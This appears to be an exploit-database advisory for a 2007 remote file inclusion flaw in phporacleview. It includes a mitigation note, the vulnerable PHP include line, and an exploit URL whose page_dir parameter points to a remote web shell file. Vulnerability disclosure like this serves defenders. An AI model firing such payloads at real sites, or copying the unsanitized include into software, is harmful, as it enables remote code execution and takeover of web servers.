phporacleview Remote File Inclusion Exploit

vendor:

phporacleview

by:

Alkomandoz Hacker

5.5

CVSS

MEDIUM

Remote File Inclusion

CWE

Product Name: phporacleview

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phporacleview Remote File Inclusion Exploit

This exploit allows an attacker to include a remote file in the phporacleview script, specifically in the inc/include_all.inc.php file. By manipulating the 'page_dir' parameter in the URL, an attacker can include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion functions. Additionally, consider using a web application firewall to detect and block malicious requests.

Source

Exploit-DB raw data:

===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


HomePge= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?

===================================

GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm

# milw0rm.com [2007-04-26]